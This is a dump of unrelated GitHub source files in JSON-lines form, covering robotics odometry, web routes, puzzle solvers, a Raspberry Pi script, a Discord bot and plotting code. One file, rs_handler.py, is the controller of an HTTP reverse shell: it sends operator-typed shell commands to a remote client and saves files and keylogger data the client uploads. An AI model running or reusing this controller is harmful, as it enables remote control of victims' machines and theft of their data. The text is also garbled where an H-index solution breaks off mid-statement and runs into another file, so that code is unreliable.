delta_p = x[:3] \n delta_q = x[3:] / np.linalg.norm(x[3:])\n pt_1 = initial_pose[:3]\n qt_1 = initial_pose[3:] / np.linalg.norm(initial_pose[3:])\n \n r = R.from_quat(qt_1)\n qt_1_mat = r.as_matrix()\n p = pt_1 + np.matmul(qt_1_mat, delta_p)\n q = hamilton_product(qt_1, 
delta_q)\n initial_pose = np.concatenate((p, q))\n \n final_poses = np.vstack((final_poses, initial_pose[np.newaxis, :]))\n return final_poses\n \n\ndef return_poses(dataset, path):\n check = torch.load(path, map_location=torch.device(\"cpu\"))\n \n data_set = IMUDataset(dataset)\n loader = DataLoader(data_set, 32)\n relative = torch.cat(list(data[\"relative_pose\"] for data in loader), dim=0)\n pose = pd.read_csv(ROOT_DIR + dataset + \"/mav0/state_groundtruth_estimate0/data.csv\").values\n\n initial_pose_true = pose[0, 1:8]\n poses_predicted = check[\"absolute_pose\"][dataset].numpy()\n\n final_poses_true = trajectory_poses(relative.numpy(), initial_pose_true)\n final_poses = trajectory_poses(poses_predicted, initial_pose_true)\n\n return final_poses_true, final_poses","repo_name":"nisharaichur/End-to-End-Learning-Framework-for-IMU-Based-6-DOF-Odometry","sub_path":"util_funs.py","file_name":"util_funs.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"19824763696","text":"from typing import Tuple\n\nfrom configs.config import ApplicationConfig\nfrom context import Context\nfrom transport.sanic import endpoints\n\n\ndef get_routes(config: ApplicationConfig, context: Context) -> Tuple:\n return (\n endpoints.HealthEndpoint(\n config=config, uri='/', methods=['POST', 'GET'], context=context),\n endpoints.CreateUserEndpoint(\n config=config, uri='/user', methods=['POST'], context=context),\n endpoints.AuthUserEndpoint(\n config=config, uri='/auth', methods=['POST'], context=context),\n endpoints.InfoUserEndpoint(\n config=config, uri='/user/', methods=['GET', 'PATCH'], context=context, need_auth=True),\n endpoints.DeleteUserEndpoint(\n config=config, uri='/delete_user/', methods=['DELETE'], context=context, need_auth=True),\n endpoints.MessageEndpoint(\n config=config, uri='/message', methods=['GET', 'POST'], context=context, need_auth=True),\n endpoints.MessageInfoEndpoint(\n config=config, uri='/message/', methods=['GET', 'PATCH', 'DELETE'],\n context=context, need_auth=True),\n )","repo_name":"kostyak127/backendnapoleonit","sub_path":"transport/sanic/endpoints/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20678908701","text":"# H-Index\n\n# Solution using the stated definition\n# https://programmers.co.kr/learn/courses/30/lessons/42747\n\ndef solution(citations):\n answer = len(citations)\n citations.sort(reverse=True)\n\n for i in range(len(citations)):\n if citations[i]= RECHECK)\n\n if cond1 or cond2:\n\n if check_command(CMD_CHECK) == False:\n started = False\n while not started:\n send_command(CMD_START, bg=True); sleep(1)\n started = check_command(CMD_CHECK)\n send_command(CMD) if DEFAULT else None\n\n tstamp = time()\n started = True\n\n now = GPIO.input(PORT)\n\n if (now != before):\n send_command(CMD); sleep(0.25)\n\n before = now\n sleep(WAIT)\n\n except Exception as e:\n #raise # <-- uncomment line if bug-hunting!\n print(str(e))\n sleep(WAIT)\n\ndef check_command(cmd, bg=False, quiet=False):\n '''\n Checks command output and optionally performs action.\n '''\n output = send_command(cmd, bg=bg)\n\n if isinstance(output, bytes): # Python3\n output = output.decode('utf8', 'ignore')\n\n try: output = int(output) # True or False\n except: output = str(output) # 0==False, 1>=True\n\n cond_false = isinstance(output, str) and output.startswith(\"False\")\n cond_true = 
isinstance(output, str) and output.startswith(\"True\")\n\n cond0 = isinstance(output, int) and output == 0\n cond1 = isinstance(output, int) and output >= 1\n\n if cond_false or cond0:\n return False\n elif cond_true or cond1:\n return True\n return None\n\ndef send_command(cmd, bg=False):\n '''\n Executes command as a foreground process by default.\n '''\n print(str(int(time()))+' => '+str(cmd))\n return Popen(cmd) if bg else check_output(cmd)\n\nif __name__ == '__main__':\n start_script()","repo_name":"nelsonaloysio/raspi_exec","sub_path":"raspi_exec.py","file_name":"raspi_exec.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17209459610","text":"from bisect import bisect_right\nfrom sys import stdin\nimport math\n\n\ndef main():\n # eratosthenes sieve\n is_prime = [True] * 5000001\n for i in range(2, int(math.sqrt(5000000)) + 1):\n if is_prime[i]:\n for j in range(i * i, 5000001, i):\n is_prime[j] = False\n primes = [i for i in range(1, 5000001) if is_prime[i]]\n\n t = int(stdin.readline())\n for _ in range(t):\n n = int(stdin.readline())\n a = list(map(int, stdin.readline().split()))\n cnt = []\n for ai in a:\n if ai % 2 == 0:\n cnt.append(ai // 2)\n else:\n for i in range(bisect_right(primes, ai) - 1, -1, -1):\n if (ai - primes[i]) % 4 == 0:\n cnt.append(1 + (ai - primes[i]) // 2)\n break\n\n min_cnt = min(cnt)\n if min_cnt % 2 == 1:\n print(\"Farmer John\", flush=False)\n else:\n john = False\n for cnt_i in cnt:\n if cnt_i == min_cnt + 1:\n john = True\n break\n elif cnt_i == min_cnt:\n break\n\n if john:\n print(\"Farmer John\", flush=False)\n else:\n print(\"Farmer Nhoj\", flush=False)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yonsweng/ps","sub_path":"boj/26973.py","file_name":"26973.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"14651272374","text":"'''\n Author: Jordan Madden\n Usage: python test.py --model=\"ssdmobilenet_v2\"\n python test.py --model=\"efficientdet_d0\" \n'''\n\nfrom playsound import playsound \nfrom threading import Thread\nimport pyrealsense2 as rs\nimport numpy as np\nimport argparse\nimport time\nimport cv2\nimport os\n\n# Suppress TensorFlow logging\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' \n\nimport tensorflow as tf\nfrom object_detection.builders import model_builder\nfrom object_detection.utils import label_map_util, config_util\nfrom object_detection.utils import visualization_utils as viz_utils\n\n# Suppress TensorFlow logging (2)\ntf.get_logger().setLevel('ERROR')\n\nclass RealSenseVideo:\n def __init__(self, width=640, height=480):\n # Frame dimensions of camera\n self.width = width\n self.height = height\n\n # Build and enable the depth and color frames\n self.pipeline = rs.pipeline()\n self.config = rs.config()\n self.config.enable_stream(rs.stream.depth, self.width, self.height, rs.format.z16, 30)\n self.config.enable_stream(rs.stream.color, self.width, self.height, rs.format.bgr8, 30)\n\n # Start streaming\n self.pipeline.start(self.config)\n \n # Read the first frame from the stream\n self.frame = self.pipeline.wait_for_frames()\n self.depth_frame = self.frame.get_depth_frame()\n self.color_frame = self.frame.get_color_frame()\n\n # Variable to check if thread should be stopped\n self.stopped = False\n\n def start(self):\n # Start the thread to read the frames from the video stream\n Thread(target=self.update, 
args=()).start()\n return self\n\n def update(self):\n while True:\n # Stop streaming in indicator is set\n if self.stopped:\n return\n\n # Otherwise read the next frame in the stream\n self.frame = self.pipeline.wait_for_frames()\n self.depth_frame = self.frame.get_depth_frame()\n self.color_frame = self.frame.get_color_frame()\n if not self.depth_frame or not self.color_frame:\n return\n\n def read(self):\n # Return the most recent color and depth frame\n return self.color_frame, self.depth_frame\n\n def stop(self) :\n # Stop the video stream\n self.stopped = True\n self.pipeline.stop()\n\ndef model_name(model):\n # Return the name of the model that was specified through the command\n # line arguement\n if model == 'ssdmobilenet_v2':\n return 'ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8'\n elif model == 'efficientdet_d0':\n return \"efficientdet_d0_coco17_tpu-32\"\n\ndef path_to_ckpt(model):\n # Return the path to the model that was specified through the command\n # line arguement\n if model == 'ssdmobilenet_v2':\n return os.path.join(MODELS_DIR, os.path.join('ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8', 'checkpoint/'))\n elif model == 'efficientdet_d0':\n return os.path.join(MODELS_DIR, os.path.join('efficientdet_d0_coco17_tpu-32', 'checkpoint/'))\n\ndef path_to_cfg(model):\n # Return the path to the model that was specified through the command\n # line arguement\n if model == 'ssdmobilenet_v2':\n return os.path.join(MODELS_DIR, os.path.join('ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8', 'pipeline.config'))\n elif model == 'efficientdet_d0':\n return os.path.join(MODELS_DIR, os.path.join('efficientdet_d0_coco17_tpu-32', 'pipeline.config')) \n\n@tf.function\ndef detect(img):\n # Preprocess the image and get the bounding box detections for objects \n # in the image\n img, shapes = detector.preprocess(img)\n prediction_dict = detector.predict(img, shapes)\n detections = detector.postprocess(prediction_dict, shapes)\n\n return (detections, prediction_dict, tf.reshape(shapes, [-1]))\n\ndef playback(commnds, motion_command):\n #Play audio recording of the given command\n playsound(commands[motion_command])\n\ndef filter_distance(depth_frame, x, y):\n #List to store the consecutive distance values and randomly initialized variable\n distances = []\n positive = np.random.randint(low=30, high=100)\n\n i = 0\n while(i < 75):\n # Extract the depth value from the camera\n dist = int(depth_frame.get_distance(x, y) * 100)\n \n # Store the last positive value for use in the event that the\n # value returned is 0\n if dist != 0:\n positive = dist\n elif dist == 0:\n positive == positive\n\n # Add the distances to the list\n distances.append(positive)\n i += 1\n\n # Convert the list to a numpy array and return it\n distances = np.asarray(distances)\n return int(distances.mean()) \n\ndef get_object_info(depth_frame, detections, scores, H, W, confidence=0.5):\n # Initialize list to store bounding box coordinates of each bounding box\n # and the distance of each block\n object_info = []\n\n for detection, score in zip(detections, scores):\n # Only move forward if score is above the threshold\n if score > confidence:\n # Extract the coordinates of the detections and normalize each detection\n y1, x1, y2, x2 = detection\n y1 = int(H*y1)\n x1 = int(W*x1)\n y2 = int(H*y2)\n x2 = int(W*x2)\n\n # Get the midpoint of each bounding box\n midX = (x1 + x2)//2\n midY = (y1 + y2)//2\n\n # Find the distance of each point\n distance = filter_distance(depth_frame, midX, midY)\n\n # Add the coordinates to the 
coordinate list and the \n object_info.append([distance, (x1, y1, x2, y2)])\n\n # Sort the data points by distance\n object_info.sort()\n\n return object_info\n\ndef command(val, frame):\n # Display the command on the screen\n text = \"Command: {}\".format(val)\n cv2.rectangle(frame, (0, 0), (180, 25), (255, 255, 255), -1)\n cv2.putText(frame, text, (10, 20), cv2.FONT_HERSHEY_SIMPLEX,\n 0.5, (0, 0, 0), thickness=2)\n\ndef checkpoints(depth_frame):\n global checkpoint_detection\n checkpoint_detection = False\n min_distance2 = 80\n W, H = 640, 480\n\n # Coordinates of the points to be checked in the frame\n center = filter_distance(depth_frame, W//2, H//2)\n right = filter_distance(depth_frame, W//2 + 90, H//2)\n left = filter_distance(depth_frame, W//2 - 90, H//2)\n l_center = filter_distance(depth_frame, W//2, H//2 + 180)\n l_right = filter_distance(depth_frame, W//2 + 60, H//2 + 180)\n l_left = filter_distance(depth_frame, W//2 - 60, H//2 + 180)\n \n # If any of the checkpoints are triggered raise a notification\n if ((center < min_distance2) or (left < min_distance2) or (right < min_distance2) or \n (l_center < min_distance2) or (l_left < min_distance2) or (l_right < min_distance2)):\n checkpoint_detection = True\n return True\n \n return False\n\ndef navigate(frame, depth_frame, dist, left, right):\n def stop_moving(dist, depth_frame):\n # Stop moving if an object is detected within 1.2 meters or if any of the \n # chekpoints are triggered\n if (dist < min_distance):\n return True \n \n # If none of the conditions are met, keep moving\n return False\n\n # Determine the midpoint of each detection and the distance between the object and \n # the left and right borders of the frame\n dist_left = left - 0\n dist_right = 640 - right\n \n if stop_moving(dist, depth_frame):\n # Stop moving for a bit while deciding what action to take\n command(\"Stop\", frame)\n time.sleep(0.5)\n\n if dist_left > dist_right:\n command(\"Left\", frame)\n elif dist_right > dist_left:\n command(\"Right\", frame)\n else:\n # Move forward\n command(\"Forward\", frame)\n\nif __name__ == \"__main__\":\n # Construct and parse the command line arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-m\", \"--model\", required=True,\n help=\"type of model to use\")\n args = vars(ap.parse_args())\n\n # Declare the filepaths and data structures for text \n # to speech\n COMMAND_PATH = 'text_to_speech/commands'\n FWD = 'forward_command.mp3'\n LEFT = 'left_command.mp3'\n RIGHT = 'right_command.mp3'\n STOP = 'stop_command.mp3'\n forwardPath = os.path.join(COMMAND_PATH, FWD)\n leftPath = os.path.join(COMMAND_PATH, LEFT)\n rightPath = os.path.join(COMMAND_PATH, RIGHT)\n stopPath = os.path.join(COMMAND_PATH, STOP)\n\n commands = {}\n commands[\"Forward\"] = forwardPath\n commands[\"Left\"] = leftPath\n commands[\"Right\"] = rightPath\n commands[\"Stop\"] = stopPath\n\n # Declare the relevant constants for object detection\n OD_BASE_PATH = 'object_detection\\\\tf2'\n DATA_DIR = os.path.join(OD_BASE_PATH, 'data')\n MODELS_DIR = os.path.join(DATA_DIR, 'models')\n MODEL_NAME = model_name(args[\"model\"])\n LABEL_FILENAME = 'mscoco_label_map.pbtxt'\n PATH_TO_LABELS = os.path.join(MODELS_DIR, os.path.join(MODEL_NAME, LABEL_FILENAME))\n PATH_TO_CKPT = path_to_ckpt(args[\"model\"])\n PATH_TO_CFG = path_to_cfg(args[\"model\"])\n\n # Declare the relevant constants for the use of the realsense camera\n SCALE_H = 0.5\n SCALE_W = 0.5\n\n # Declare variables and constants for navigation\n checkpoint_detection = False\n min_distance = 
120\n \n # Build the object detector, restore its weights from the checkpoint file\n # and load the label map\n print(\"[INFO] building model pipeline and detector...\")\n configs = config_util.get_configs_from_pipeline_file(PATH_TO_CFG)\n model_config = configs['model']\n detector = model_builder.build(model_config=model_config, is_training=False)\n\n print(\"[INFO] restoring model checkpoint...\")\n PATH_TO_RESTORE = os.path.join(PATH_TO_CKPT, 'ckpt-0')\n ckpt = tf.compat.v2.train.Checkpoint(model=detector)\n ckpt.restore(PATH_TO_RESTORE).expect_partial()\n\n category_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True)\n\n # Start the video stream\n print(\"[INFO] starting video stream...\")\n vs = RealSenseVideo(width=640, height=480).start()\n time.sleep(1)\n\n try:\n while True:\n # Get the video frames from the camera\n color_frame, depth_frame = vs.read() \n\n # Extract the dimensions of the depth frame\n (H, W) = depth_frame.get_height(), depth_frame.get_width()\n\n # Convert images to numpy arrays\n depth_image = np.asanyarray(depth_frame.get_data())\n color_image = np.asanyarray(color_frame.get_data())\n\n # Apply colormap on depth image (image must be converted to 8-bit per pixel first)\n # and extract the image dimensions\n depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\n \n # Downsize frame before feeding it into the object detector\n frame = color_image \n color_image = np.expand_dims(color_image, axis=0)\n input_tensor = tf.convert_to_tensor(color_image, dtype=tf.float32)\n\n # Run the object detection and get the results\n (detections, predictions_dict, shapes) = detect(input_tensor)\n\n label_id_offset = 1\n frame = frame.copy()\n\n viz_utils.visualize_boxes_and_labels_on_image_array(\n frame,\n detections['detection_boxes'][0].numpy(), \n (detections['detection_classes'][0].numpy() + label_id_offset).astype(int),\n detections['detection_scores'][0].numpy(),\n category_index,\n use_normalized_coordinates=True,\n max_boxes_to_draw=200,\n min_score_thresh=.50,\n agnostic_mode=False)\n\n # Convert the detections and their respective scores from numpy arrays to lists\n DETECTIONS = detections['detection_boxes'][0].numpy().tolist()\n SCORES = detections['detection_scores'][0].numpy().tolist()\n points = get_object_info(depth_frame, DETECTIONS, SCORES, H, W)\n print(points)\n time.sleep(2)\n\n for point in points:\n # Extract the bounding box coordinates and distance of each detection\n dist, coords = point\n x1, y1, x2, y2 = coords\n \n # Find the mid-point coordinates\n midX = (x1+x2)//2\n midY = (y1+y2)//2\n\n # Draw a circle at the midpoint for visual validation\n cv2.circle(frame, (midX, midY), radius=5, \n color=(0,0,255), thickness=2) \n\n # Display the distance of each object from the camera\n text = \"Distance: {}cm\".format(dist)\n cv2.putText(frame, text, (midX, midY-20), cv2.FONT_HERSHEY_SIMPLEX, \n 0.5, (0, 0, 255), thickness=2)\n\n # Determine what command to give to the user\n navigate(frame, depth_frame, dist, x1, x2)\n \n if not checkpoint_detection:\n if checkpoints(depth_frame):\n command(\"Stop\", frame)\n time.sleep(0.5)\n else:\n command(\"Forward\", frame)\n\n checkpoint_detection = False\n\n # Display the video frame \n cv2.namedWindow('RealSense')\n cv2.imshow('RealSense', frame)\n\n # End the video stream is the letter \"Q\" is pressed\n key = cv2.waitKey(25) & 0xFF\n if key == ord('q'):\n print(\"[INFO] Ending video stream...\")\n break\n\n # Stop 
streaming\n vs.stop()\n cv2.destroyAllWindows()\n \n except Exception as e:\n print(\"Problem: {}\".format(e))","repo_name":"neddamj/AINSB","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"74937089493","text":"from http.server import BaseHTTPRequestHandler\nimport cgi\nfrom config import App\n\nclass rs_handler(BaseHTTPRequestHandler):\n\n # Gets user input and send it to client with request headers\n def do_GET(user_input):\n command = input(\"Shell> \")\n user_input.send_response(200)\n user_input.send_header(\"Content-type\", \"text/html\")\n user_input.end_headers()\n user_input.wfile.write(command.encode())\n\n # Gets data from the POST request & prints it out. \n def do_POST(user_input):\n if user_input.path == '/store' or user_input.path == '/logger':\n try:\n # Get the content type headers & check if they're the right type.\n ctype, pdict = cgi.parse_header(user_input.headers.get_content_type())\n if ctype == 'multipart/form-data':\n # Store request in FieldStorage object.\n fs = cgi.FieldStorage(fp = user_input.rfile,\n headers = user_input.headers,\n environ = {'REQUEST_METHOD':'POST'})\n else:\n print('[!] An unexpected error occurred.')\n file_item = fs['file']\n with open(App.config('OUTPUTFILEPATH'), 'wb') as o:\n o.write(file_item.file.read())\n user_input.send_response(200)\n user_input.end_headers()\n\n except Exception as e:\n print(e)\n \n user_input.send_response(200)\n user_input.end_headers()\n request_length = int(user_input.headers['Content-Length'])\n request_data = user_input.rfile.read(request_length)\n print(request_data)\n\n\n\n \n","repo_name":"calpet/http_reverse_shell","sub_path":"src/rs_handler.py","file_name":"rs_handler.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25779280446","text":"import boto3\nfrom datetime import datetime\nfrom botocore.exceptions import ClientError\n\n\ndef execute_glue_api(DATABASE_NAME,TB_NAME,partition_val):\n client = boto3.client('glue',region_name='eu-west-2')\n try:\n client.delete_partition(DatabaseName=DATABASE_NAME,TableName=TB_NAME,PartitionValues=[partition_val])\n except ClientError as e:\n print('partition not exist',e.response['Error']['Code'])\n\ndef lambda_handler(event, context):\n DATABASE_NAME='api_input_notprod'\n TB_NAME='input_file_api'\n partition_val='2019-12-03/12:03:29.036194'\n execute_glue_api(DATABASE_NAME,TB_NAME,partition_val)\n return { 'statusCode': 200 }\n","repo_name":"sidaker/dq","sub_path":"src/lambda_execute_glueapi.py","file_name":"lambda_execute_glueapi.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3114653230","text":"#!/usr/bin/env python\n\n\"\"\"\n Cryptopy Version 2\n Crypte et decrypte un texte en chiffrement Cesar.\n Sait travailler avec le contenu d'un fichier texte.\n\"\"\"\n\n#### Imports\nimport string\n\n#### Constantes\nJEUCAR = string.printable[:-5]\nCARSUBSTI = JEUCAR[-3:]+JEUCAR[:-3]\nMSG_TEST = \"J'adore les Monty Python. Trop cool.\"\n\n# Generation du dictionnaire avec le jeu de caracteres\n# (en clair)\nDICO_ENCRYP = {}\nfor i,k in enumerate(JEUCAR):\n v = CARSUBSTI[i]\n DICO_ENCRYP[k] = v\n# Les autres \\t, \\n etc. 
restent tels quels\nfor c in string.printable[-5:]:\n DICO_ENCRYP[c] = c\n\n### Fonctions\ndef encrypter(texteclair, vardico_cryp):\n \"\"\"\n Crypte le message texteclair avec le dictionnaire fourni et renvoie le \n texte une fois rendu illisible.\n \"\"\"\n textesecret = []\n for k in texteclair:\n v = vardico_cryp[k]\n textesecret.append(v)\n return ''.join(textesecret)\n\ndef decrypter(textesecret, vardico_decryp):\n \"\"\"\n Decrypte le message avec le dictionnaire fourni et renvoie le \n texte une fois rendu lisible.\n \"\"\"\n texteclair = []\n for k in textesecret:\n v = vardico_decryp[k]\n texteclair.append(v)\n return ''.join(texteclair)\n\n### Main Section\ntextesecret = encrypter(MSG_TEST, DICO_ENCRYP)\nprint(MSG_TEST)\nprint(textesecret)","repo_name":"baliaga31/Python","sub_path":"Python_dummies/Week_03/Projet_07/cryptopy_v03.py","file_name":"cryptopy_v03.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8497684862","text":"import pylab as pyl\nfrom astLib import astStats\nimport h5py as hdf\nfrom matplotlib.ticker import AutoMinorLocator\n\n\ndef calc_err(pred, true):\n return (pred - true) / true\n\n\ngolden_mean = (pyl.sqrt(5.) - 1.0) / 2.0\nf = pyl.figure(figsize=(7 * golden_mean, 7))\n\nax1 = pyl.subplot2grid((3, 1), (0, 0), rowspan=2)\n\n# now for the bottom bits\nax1s = pyl.subplot2grid((3, 1), (2, 0))\n\nax1.set_xticklabels([])\n# add minor ticks to the bottom\nax1s.yaxis.set_minor_locator(AutoMinorLocator())\n\n### Targeted ###\n################\nwith hdf.File('./buzzard_targetedRealistic_comparison_shifty.hdf5', 'r') as f:\n dset = f[f.keys()[0]]\n target = dset['M200c', 'MASS', 'ML_pred_1d', 'ML_pred_2d2', 'ML_pred_3d']\n# filter bad values\nmask = (target['ML_pred_1d'] != 0)\ntarget = target[mask]\n\n# plot one to one lines\nax1.plot([11.5, 15.5], [11.5, 15.5], c='k', zorder=0)\nax1s.axhline(0)\n\n# now for the plotting\n###################\n#### Power Law ####\n###################\n\nc = '#cf4457'\nzo = 0\n\nprint('power law')\ny_ = astStats.runningStatistic(\n pyl.log10(target['M200c']),\n pyl.log10(target['MASS']),\n pyl.percentile,\n binNumber=15,\n q=[16, 50, 84])\nquants = pyl.array(y_[1])\nax1.plot(y_[0], quants[:, 1], '-', c=c, zorder=zo)\n\nif not c == '#e24a33':\n ax1.fill_between(y_[0],\n quants[:, 2],\n quants[:, 0],\n facecolor=c,\n alpha=0.3,\n edgecolor=c)\nerr = calc_err(target['MASS'], target['M200c'])\ny_ = astStats.runningStatistic(\n pyl.log10(target['M200c']),\n err,\n pyl.percentile,\n binNumber=15,\n q=[16, 50, 84])\nquants = pyl.array(y_[1])\nax1s.plot(y_[0], quants[:, 1], '-', c=c, zorder=zo)\n\nif not c == '#e24a33':\n ax1s.fill_between(y_[0],\n quants[:, 2],\n quants[:, 0],\n facecolor=c,\n alpha=0.3,\n edgecolor=c)\n\n##############\n##### 3d #####\n##############\n\nc = '#467821'\nzo = 1\n\nprint('2d2')\ny_ = astStats.runningStatistic(\n pyl.log10(target['M200c']),\n target['ML_pred_2d2'],\n pyl.percentile,\n binNumber=15,\n q=[16, 50, 84])\nquants = pyl.array(y_[1])\nax1.plot(y_[0], quants[:, 1], '--', c=c, zorder=zo)\nif not c == '#e24a33':\n ax1.fill_between(y_[0],\n quants[:, 2],\n quants[:, 0],\n facecolor=c,\n alpha=0.4,\n edgecolor=c)\nerr = calc_err(10**target['ML_pred_2d2'], target['M200c'])\ny_ = astStats.runningStatistic(\n pyl.log10(target['M200c']),\n err,\n pyl.percentile,\n binNumber=15,\n q=[16, 50, 84])\nquants = pyl.array(y_[1])\nax1s.plot(y_[0], quants[:, 1], '--', c=c, zorder=zo)\nif not c == '#e24a33':\n 
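# shade the region between the 16th and 84th percentile curves of the fractional mass error\n    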
ax1s.fill_between(y_[0],\n quants[:, 2],\n quants[:, 0],\n facecolor=c,\n alpha=0.4,\n edgecolor=c)\n\n### Add Legend ###\n##################\nline1 = pyl.Line2D([], [], ls='-', color='#cf4457')\nline2 = pyl.Line2D([], [], ls='--', color='#467821')\nax1.legend([line1, line2], ['Power Law', '$ML_{\\sigma, Ngal}$'], loc=2)\n\n#### tweak ####\nax1.set_xticks([12, 13, 14, 15])\nax1s.set_xticks([12, 13, 14, 15])\nax1s.set_ylim(-2, 4)\nax1s.set_yticks([-2, 0, 2])\n\nax1.set_ylabel('Log $M_{pred}$')\nax1s.set_ylabel('$\\epsilon$')\nax1s.set_xlabel('Log $M_{200c}$', fontsize=18)\n\n#ax1.text(14, 12.25, 'Power Law', fontsize=18, horizontalalignment='center')\n#ax4.text(14, 12.25, '$ML_{\\sigma, z, Ngal}$', fontsize=18,\n# horizontalalignment='center')\npyl.show()\n","repo_name":"boada/vpCluster","sub_path":"data/boada/analysis_all/MLmethods/plot_massComparison_single.py","file_name":"plot_massComparison_single.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"43886566282","text":"import disnake\r\nfrom disnake.ext import commands\r\n\r\n\r\nclass reply_to_users(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.count = 0\r\n\r\n @commands.Cog.listener()\r\n async def on_message(self, message: disnake.Message):\r\n self.count += 1\r\n messages = await message.channel.history(limit=100).flatten()\r\n\r\n if message.content.startswith('hello'):\r\n await message.channel.send(\"hi\", delete_after=50)\r\n\r\n elif \"!help\" in message.content:\r\n await message.channel.send(\"type --> **/help**\", delete_after=50)\r\n\r\n elif \"!end\" in message.content:\r\n # messages = msg.content\r\n with open(\"ticket.txt\", 'w') as f:\r\n for msg in messages:\r\n ticket_msg = msg.content\r\n f.write(f\"{msg.author}: {ticket_msg}\")\r\n f.write('\\n')\r\n\r\n\r\ndef setup(bot: commands.bot):\r\n bot.add_cog(reply_to_users(bot))\r\n","repo_name":"fancydsDEV/Discord-bot-Tatsuwari-","sub_path":"cogs/event_log/reply_to_user.py","file_name":"reply_to_user.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4194889983","text":"import time\r\n\r\n'''helper methods'''\r\n\r\nfrom collections import deque\r\n\r\nunique = set()\r\ndef display(initial_state):\r\n print(\"-------------\")\r\n print(\"| \" + initial_state[0] + \" | \" + initial_state[1] + \" | \" + initial_state[2] + \" | \")\r\n print(\"-------------\")\r\n print(\"| \" + initial_state[3] + \" | \" + initial_state[4] + \" | \" + initial_state[5] + \" | \")\r\n print(\"-------------\")\r\n print(\"| \" + initial_state[6] + \" | \" + initial_state[7] + \" | \" + initial_state[8] + \" | \")\r\n print(\"-------------\")\r\n\r\n\r\ndef generate_children(state):\r\n list = []\r\n list_states = []\r\n for s in state:\r\n list.append(s)\r\n pos0 = list.index('0')\r\n if pos0 == 0:\r\n list_states.extend([swap(state, 0, 1), swap(state, 0, 3)]) # list[1], list[3]\r\n elif pos0 == 1:\r\n list_states.extend([swap(state, 1, 0), swap(state, 1, 2), swap(state, 1, 4)]) # 0 2 4\r\n elif pos0 == 2:\r\n list_states.extend([swap(state, 2, 1), swap(state, 2, 5)]) # 1 5\r\n elif pos0 == 3:\r\n list_states.extend([swap(state, 3, 0), swap(state, 3, 4), swap(state, 3, 6)]) # 0 4 6\r\n elif pos0 == 4:\r\n list_states.extend([swap(state, 4, 1), swap(state, 4, 3), swap(state, 4, 5), swap(state, 4, 7)]) # 1 3 5 7\r\n elif pos0 == 5:\r\n 
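# blank tile at index 5 (middle row, right column): it can move up (2), left (4) or down (8)\r\n        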
list_states.extend([swap(state, 5, 2), swap(state, 5, 4), swap(state, 5, 8)]) # 2 4 8\r\n    elif pos0 == 6:\r\n        list_states.extend([swap(state, 6, 3), swap(state, 6, 7)]) # 3 7\r\n    elif pos0 == 7:\r\n        list_states.extend([swap(state, 7, 4), swap(state, 7, 6), swap(state, 7, 8)]) # 4 6 8\r\n    elif pos0 == 8:\r\n        list_states.extend([swap(state, 8, 5), swap(state, 8, 7)]) # 5 7\r\n    return list_states\r\n\r\n\r\ndef possible_cases(final_state):\r\n    final_set = set()\r\n    frontier = deque()\r\n    explored = set()\r\n    frontier.append(final_state)\r\n    while len(frontier) > 0:\r\n        n = frontier.popleft()\r\n        for a in findNextStates(n):\r\n            if a not in explored:\r\n                explored.add(a)\r\n                frontier.append(a)\r\n                if a[0] == '0':\r\n                    final_set.add(a)\r\n    return len(final_set)\r\n\r\n\r\ndef BreadthFirstSearch(initial_state):\r\n    frontier = deque()\r\n    explored = {}\r\n    frontier.append(initial_state)\r\n    while len(frontier) > 0:\r\n        n = frontier.popleft()\r\n        if goalTest(n):\r\n            counter = 0\r\n            state_checker = n\r\n            list = [] #this list will add the path backward, purpose: generate_path\r\n            list.append('012345678') #solved case\r\n            while state_checker != initial_state:\r\n                state_checker = explored[state_checker]\r\n                counter += 1 #shortest_path counter\r\n                list.append(state_checker)\r\n            #list.append(initial_state)\r\n            generate_path(list)\r\n            return counter\r\n        else:\r\n            for a in generate_children(n):\r\n                if a not in explored.keys(): #if not in explored, map a to n, a is key, n is value\r\n                    explored[a] = n\r\n                    frontier.append(a)\r\n    return \"No solution\", explored\r\n\r\n\r\ndef goalTest(state):\r\n    if state == \"012345678\":\r\n        return True\r\n    return False\r\n\r\ndef generate_path(list):\r\n    row1 = \"\"\r\n    row2 = \"\"\r\n    row3 = \"\"\r\n    for i in list[::-1]:\r\n        for x in range(0, 3):\r\n            row1 += i[x]\r\n        row1 += \" \"\r\n        for x in range(3, 6):\r\n            row2 += i[x]\r\n        row2 += \" \"\r\n        for x in range(6, 9):\r\n            row3 += i[x]\r\n        row3 += \" \"\r\n\r\n    print(row1)\r\n    print(row2)\r\n    print(row3)\r\n    